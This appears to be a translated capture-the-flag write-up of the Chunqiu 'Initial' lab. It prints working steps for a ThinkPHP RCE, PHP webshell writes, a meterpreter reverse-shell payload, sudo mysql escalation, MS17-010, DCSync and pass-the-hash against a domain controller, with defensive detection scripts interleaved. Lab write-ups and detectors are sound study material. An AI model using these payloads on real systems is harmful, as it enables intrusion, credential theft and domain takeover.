Chunqiu Cloud Range (春秋云镜) - Initial

Initial

Only the key steps are recorded.

External foothold

http://47.92.100.172/


ThinkPHP 5.0.23 RCE

POST
http://47.92.100.172/?s=captcha&test=-1
_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=ls

Writing a webshell

_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=echo '<?php eval($_POST[1]);?>' > /var/www/html/1.php
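As an added example (not code from the original writeup), the following Python classifier flags the ThinkPHP 5.0.x request pattern used in the two payloads above when run over request records. The sample requests are constructed to mirror those payloads; the record shape (method, path+query, body) and the finding names are my own assumptions, not a real WAF format.

```python
from urllib.parse import parse_qs

# Constructed sample requests (method, path+query, POST body) in the shape a
# reverse proxy or WAF audit log might record them. Not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/?s=captcha&test=-1",
     "_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=ls"),
    ("POST", "/?s=captcha&test=-1",
     "_method=__construct&filter=system&method=get&server[REQUEST_METHOD]="
     "echo+%27%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%27+%3E+%2Fvar%2Fwww%2Fhtml%2F1.php"),
    ("GET", "/index.php?s=index/index", ""),
    ("POST", "/login", "username=alice&password=secret"),
]

# PHP callables that execute their argument when abused as a ThinkPHP "filter".
DANGEROUS_FILTERS = {"system", "exec", "shell_exec", "passthru", "assert"}


def classify_request(method, target, body):
    """Return the list of findings for one request (empty list = nothing suspicious)."""
    findings = []
    if method != "POST":
        return findings
    params = parse_qs(body, keep_blank_values=True)
    # ThinkPHP 5.0.x method override: _method=__construct re-initialises the
    # Request object from the POST body, which is the root of this RCE.
    if params.get("_method", [""])[0] == "__construct":
        findings.append("thinkphp-method-override")
        filt = params.get("filter", [""])[0]
        if filt in DANGEROUS_FILTERS:
            findings.append("dangerous-filter:" + filt)
        # Whatever is placed into server[...] / get[...] becomes the filter's argument;
        # a PHP open tag there means a file write of a shell is being attempted.
        for key, values in params.items():
            if key.startswith(("server[", "get[")):
                if any("<?php" in v.lower() for v in values):
                    findings.append("webshell-write")
    return findings


def scan(requests):
    """Run the classifier over many records; return (index, target, findings) for hits."""
    hits = []
    for i, (method, target, body) in enumerate(requests):
        found = classify_request(method, target, body)
        if found:
            hits.append((i, target, found))
    return hits


if __name__ == "__main__":
    for idx, target, found in scan(SAMPLE_REQUESTS):
        print(idx, target, found)
```

The override only matters because the vulnerable version lets `_method` select `__construct`; upgrading ThinkPHP past 5.0.23 (or disabling the method override) removes the root cause, and the classifier is only a detection layer on top of that.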

Here msf is used for post-exploitation.

Generate an ELF payload

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=120.27.248.81 lport=44444 -f elf > reverse_msf_shell

Start the listener


Session checks in on msf


Get all network segments of the machine

meterpreter > run post/multi/manage/autoroute 

[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 172.22.1.15
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.22.0.0/255.255.0.0 from host's routing table.

Configure a static route

meterpreter > run post/multi/manage/autoroute SUBNET=172.22.0.0 ACTION=ADD

[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 172.22.1.15
[*] Adding a route to 172.22.0.0/255.255.255.0...
[+] Route added to subnet 172.22.0.0/255.255.255.0.


Privilege escalation is a direct sudo

sudo mysql -e '\! /bin/sh'


Got the first flag

(ASCII-art banner)

Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.

flag01: flag{60*****

Setting up a tunnel

Use Neo-reGeorg to set up the tunnel

https://github.com/L-codes/Neo-reGeorg

python .\neoreg.py generate -k aeqaq

Start the local proxy against the uploaded tunnel file

python .\neoreg.py -k aeqaq -u http://39.98.240.85/tunnel.php -p 4444

Then configure the Proxifier rules


Information gathering

Use Ladon to scan the /24

SMB: 172.22.1.2   XIAORANG   DC01            (Win2016-Datacenter-14393_10.0.14393)
SMB: 172.22.1.21  XIAORANG   XIAORANG-WIN7   (Win7-Professional-7601-SP1_6.1.7601)
SMB: 172.22.1.18  XIAORANG   XIAORANG-OA01   (Win2012-R2-Datacenter-9600_6.3.9600)

Another host was found, 172.22.1.18.

Scan its open ports

172.22.1.18   139  Open -> Banner: Windows Netbios
172.22.1.18   135  Open -> Default is WMI
172.22.1.18  3389  Open -> Default is RDP
172.22.1.18   445  Open -> Default is SMB
172.22.1.18  3306  Open -> Default is Mysql
172.22.1.18    80  Open -> Banner: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9

Second host

172.22.1.18

A directory scan turned up phpMyAdmin.

root/root logs straight in, so it's the usual getshell.

Enable the general log

set global general_log = "ON";

Check where the log is currently stored

show variables like 'general%';
C:\phpStudy\PHPTutorial\MySQL\data\XIAORANG-OA01.l...

Get a webshell via general_log_file

set global general_log_file = "C:/phpStudy/PHPTutorial/www/1.php";

Write the shell through the log

SELECT '<?php eval($_POST["123"]);?>'

That writes the webshell.
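Added example, not part of the original writeup: a small Python audit of the `general_log` / `general_log_file` server variables that would catch the misconfiguration this step relies on (log enabled, log file pointed into the document root with an executable extension). The variable dictionaries, the web-root list and the file names are constructed; the `.log` file name in the hardened sample is a placeholder, not the truncated path shown on the page.

```python
import posixpath

# Constructed `SHOW VARIABLES LIKE 'general%'` results: one sane server and
# one where the log has been redirected into the web root. Not real output.
HARDENED = {
    "general_log": "OFF",
    "general_log_file": r"C:\phpStudy\PHPTutorial\MySQL\data\SERVER.log",  # placeholder name
}
ABUSED = {
    "general_log": "ON",
    "general_log_file": "C:/phpStudy/PHPTutorial/www/1.php",
}

# Document roots that the database log must never point into (assumed list).
WEB_ROOTS = [r"C:\phpStudy\PHPTutorial\www", "/var/www/html"]
EXECUTABLE_EXT = {".php", ".phtml", ".php5", ".phar", ".asp", ".aspx", ".jsp"}


def _norm(path):
    """Normalise separators and case so Windows and POSIX paths compare reliably."""
    return path.replace("\\", "/").rstrip("/").lower()


def audit_general_log(variables, web_roots=WEB_ROOTS):
    """Return a list of findings; an empty list means the setting looks sane."""
    findings = []
    log_on = variables.get("general_log", "OFF").upper() == "ON"
    path = _norm(variables.get("general_log_file", ""))
    # A query log should end in .log; a script extension means it was chosen for the web server.
    if posixpath.splitext(path)[1] in EXECUTABLE_EXT:
        findings.append("log-file-has-executable-extension")
    # The log must stay in the data directory, never under a document root.
    for root in web_roots:
        if path.startswith(_norm(root) + "/"):
            findings.append("log-file-inside-webroot")
            break
    # Only an enabled log actually writes attacker-controlled query text to disk.
    if log_on and findings:
        findings.append("general-log-enabled-while-misconfigured")
    return findings


if __name__ == "__main__":
    print("hardened:", audit_general_log(HARDENED))
    print("abused:  ", audit_general_log(ABUSED))
```

Changing `general_log_file` with `SET GLOBAL` needs the SUPER privilege (or `SYSTEM_VARIABLES_ADMIN` on MySQL 8), so the check pairs naturally with reviewing which accounts hold that right; a web-facing login such as root/root with SUPER is what makes this route work.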

(ASCII-art banner)


flag02: ******

Awesome! ! ! You found the second flag, now you can attack the domain controller.

Third host

SMB: 172.22.1.21 XIAORANG XIAORANG-WIN7 (Win7-Professional-7601-SP1_6.1.7601)

Open ports:

172.22.1.21   139  Open -> Banner: Windows Netbios
172.22.1.21  5357  Open -> Banner: Win7 Microsoft-HTTPAPI
172.22.1.21   135  Open -> Default is WMI
172.22.1.21   445  Open -> Default is SMB
172.22.1.21  3389  Open -> Default is RDP

Seeing Win7, try MS17-010


The Win7 box has no outbound access, so a bind (forward) listener is used for the exploit.

EternalBlue gave some trouble here and wouldn't go through; switching to Kali resolved it easily.


Domain information gathering: locate the domain controller


Domain controller

Domain controller: 172.22.1.2

Credential dumping via a DCSync attack

load kiwi
dcsync_ntlm Administrator
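Added example (not from the original writeup): detecting the DCSync step above from the domain controller's Security log. DCSync asks a DC for replication data, which surfaces as Event ID 4662 carrying the DS-Replication-Get-Changes control-access GUIDs; the two GUIDs below are the real well-known values, while the event records, the account names and the DC account list are constructed and simplified.

```python
import re

# Well-known control-access GUIDs for directory replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")

# Constructed, simplified Event ID 4662 records (real events carry more fields).
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: subject is another domain controller's machine account.
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "XIAORANG",
     "ObjectType": "domainDNS", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
     "IpAddress": "172.22.1.3"},
    # A user account requesting replication of the whole naming context: DCSync.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "XIAORANG",
     "ObjectType": "domainDNS",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
     "IpAddress": "172.22.1.21"},
    # Unrelated directory access (user object GUID), not replication.
    {"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectDomainName": "XIAORANG",
     "ObjectType": "user", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "IpAddress": "172.22.1.18"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "SubjectDomainName": "XIAORANG"},
]


def detect_dcsync(events, dc_accounts):
    """Return (subject, source_ip, replication_guids) for 4662 events that look like DCSync.

    dc_accounts: machine accounts of legitimate domain controllers (e.g. {"DC01$"}),
    whose replication requests are expected and therefore suppressed.
    """
    expected = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = set(GUID_RE.findall(ev.get("Properties", "").lower()))
        repl = guids & REPL_GUIDS
        if not repl:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in expected:
            continue  # replication between DCs is normal
        alerts.append((subject, ev.get("IpAddress", ""), sorted(repl)))
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print("possible DCSync:", alert)
```

Event 4662 is only produced when Directory Service Access auditing is on and the domain root carries a SACL covering these rights. Accounts that legitimately replicate outside the DC set (for example an Azure AD Connect `MSOL_` account) belong in an allow-list next to `dc_accounts` rather than being ignored wholesale, and the alert is a good pivot to the originating host, which on this range would be the compromised Win7 machine.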


Pass-the-hash takes the domain controller directly; here smbexec.py from impacket is used for it.

┌──(root㉿kali)-[~/impacket/examples]
└─# python smbexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 XIAORANG/administrator@172.22.1.2
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>type C:\Users\Administrator\flag\flag03.txt
(ASCII-art banner)


flag03: *****}

Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.

Summary

Overall it is not hard and suits people with no internal-network background learning from zero; it's just a little pricey.